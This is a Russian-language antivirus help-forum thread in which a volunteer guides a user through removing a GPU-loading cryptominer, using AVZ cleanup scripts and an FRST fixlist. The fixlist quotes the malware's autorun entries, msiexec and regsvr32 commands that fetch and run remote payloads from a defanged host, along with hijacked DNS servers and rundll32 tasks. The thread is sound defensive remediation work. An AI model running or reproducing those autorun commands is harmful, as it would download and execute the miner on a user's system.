Вирус нагружает видеокарту на 100%, лог приложен.
Вирус нагружает видеокарту на 100%, лог приложен.
Уважаемый(ая) disip1239, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
![]()
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Выполните скрипт в AVZ
Будет выполнена перезагрузка компьютера.Код:begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('c:\windows\debug\ok.dat',''); TerminateProcessByName('c:\windows\syswow64\lsmos.exe'); QuarantineFile('c:\windows\syswow64\lsmos.exe',''); DeleteFile('c:\windows\syswow64\lsmos.exe','32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','command'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command'); DeleteFile('C:\Windows\system32\Tasks\CheckControllerUpdatesUA','64'); DeleteFile('C:\Windows\system32\Tasks\Mysa','64'); DeleteFile('C:\Windows\system32\Tasks\Mysa1','64'); DeleteFile('C:\Windows\system32\Tasks\Mysa2','64'); DeleteFile('C:\Windows\system32\Tasks\Mysa3','64'); DeleteFile('C:\Windows\system32\Tasks\ok','64'); DeleteFile('c:\windows\debug\ok.dat','32'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end.
Выполните скрипт в AVZ
c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.Код:begin CreateQurantineArchive('c:\quarantine.zip'); end.
Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к следующему сообщению НОВЫЕ логи.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Карантин отправил, логи прикладываю
Скачайте Farbar Recovery Scan Toolи сохраните на Рабочем столе.
- Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
прикрепляю скан.
1. Откройте Блокнот и скопируйте в него приведенный ниже текст
2. Нажмите Файл – Сохранить какКод:CreateRestorePoint: HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{8b031456-17c9-4172-bdd9-79d9b8e88a8d} <==== ATTENTION (Restriction - IP) Tcpip\..\Interfaces\{672CFF6D-392E-41DD-AE80-5DFE7A6F3F02}: [NameServer] 98.158.96.96,91.109.206.194 Tcpip\..\Interfaces\{E352C842-F100-429B-946A-16D7D187F1BF}: [NameServer] 98.158.96.96,91.109.206.194 Tcpip\..\Interfaces\{ED592988-2A6B-4B2F-A7C3-0280A5C4F5DE}: [NameServer] 98.158.96.96,91.109.206.194 Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File CHR HKU\S-1-5-21-2748248804-2255104125-3275640075-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2748248804-2255104125-3275640075-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [iifchhfnnmpdbibifmljnfjhpififfog] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx S2 wsaudio; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL) S2 wsaudio; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL) Task: {16FEA72A-EDB4-4E6A-B040-0F53A6A0E0F2} - \Mysa -> No File <==== ATTENTION Task: {29CCDC6C-05DF-4B4E-87FA-CE2522A82BBE} - \Mysa3 -> No File <==== ATTENTION Task: {2C7E1E1B-CB74-44EB-A685-7EFA57D556DE} - System32\Tasks\EuropeanShoversV2 => rundll32.exe CompulsiveCoachmen.dll,main 7 1 <==== ATTENTION Task: {40CF28CE-33F0-457F-8B16-74CD6C123C8A} - System32\Tasks\EnwombingCashboxesV2 => rundll32.exe DisturbsSeconded.dll,main 7 1 <==== ATTENTION Task: {44047465-20DB-4AC0-89E9-3FD120EA7F61} - \CheckControllerUpdatesUA -> No File <==== ATTENTION Task: {60CFB6CA-004E-4EF0-A147-5447A7884738} - \Mysa1 -> No File <==== ATTENTION Task: {9453261E-4771-4CB1-A99A-E9D0BEB9C56C} - \ok -> No File <==== ATTENTION Task: {AD6D8B6A-123F-4691-8675-44006FA10FEC} - System32\Tasks\HoleproofProficientlyV2 => rundll32.exe PorticoDisabilities.dll,main 7 1 <==== ATTENTION Task: {B60392F3-81FA-4626-A030-FA164BCAC7D9} - \GRAFFAGrouperTourismV2 -> No File <==== ATTENTION Task: {EE331AAA-B726-4E49-B86D-B83B8B9141F7} - \Mysa2 -> No File <==== ATTENTION Reboot:
3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
4. Укажите Тип файла – Все файлы (*.*)
5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
- Обратите внимание, что будет выполнена перезагрузка компьютера.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
лог
Что с проблемой?
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
из автозагрузки ерунда пропала и видеокарту пока ничего не нагружало, спасибо.
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 1
- В ходе лечения вредоносные программы в карантинах не обнаружены
Уважаемый(ая) disip1239, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.